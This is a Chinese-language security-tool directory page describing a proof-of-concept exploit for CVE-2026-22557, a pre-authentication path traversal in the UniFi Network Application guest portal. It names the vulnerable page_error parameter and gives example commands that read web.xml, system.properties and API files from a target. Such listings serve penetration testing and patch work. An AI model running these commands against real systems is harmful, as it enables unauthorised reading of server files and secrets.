Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-22557-PoC — PoC for UniFi Network Application Pre-Auth Path Traversal (CVE-2026-22557) | Kitploit
工具/GitHubGitHub/thepotatoofdoom/cve-2026-22557-poc
漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试
GitHubthepotatoofdoom/cve-2026-22557-poc

CVE-2026-22557-PoC

PoC for UniFi Network Application Pre-Auth Path Traversal (CVE-2026-22557)

查看仓库
435个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-22557 -- UniFi Network Application 预认证路径遍历

UniFi Network Application 访客门户(/guest/s/{site}/login)中存在预认证路径遍历漏洞。page_error 查询参数未经校验即被传递给资源加载器,允许未认证的攻击者读取 Web 应用中的文件(例如 WEB-INF/web.xml)。

如果访客门户页面已被自定义,资源加载器似乎会回退到原始的 FileInputStream 分支,该分支可以访问上下文根目录之外底层系统上的任意文件。我尚未确认这一点,如果有时间将进一步调查。

用法

root@kitploit:~
pip install requests
python CVE-2026-22557.py <target_url> [-f FILE] [-g GUEST_PATH] [-o OUTPUT] [-x PROXY]
标志描述默认值
target目标 URL(例如 https://host:8843)(必填)
-f要读取的相对路径../../web.xml
-g访客门户路径/guest/s/default/login
-o将响应写入文件(标准输出)
-x代理 URL(无)

示例

image
root@kitploit:~
# 默认 -- 读取 WEB-INF/web.xml(HTTPS 访客门户)
python CVE-2026-22557.py https://192.168.1.1:8843

# HTTP 访客门户
python CVE-2026-22557.py http://192.168.1.1:8880

# 读取 classpath 资源
python CVE-2026-22557.py https://192.168.1.1:8843 -f ../system.properties

# 读取 API 架构并保存到文件
python CVE-2026-22557.py https://192.168.1.1:8843 -f ../api/fields/Setting.json -o setting.json

# 不同的站点名称
python CVE-2026-22557.py https://192.168.1.1:8843 -g /guest/s/mysite/login

# 通过代理
python CVE-2026-22557.py https://192.168.1.1:8843 -x http://127.0.0.1:8080
下载工具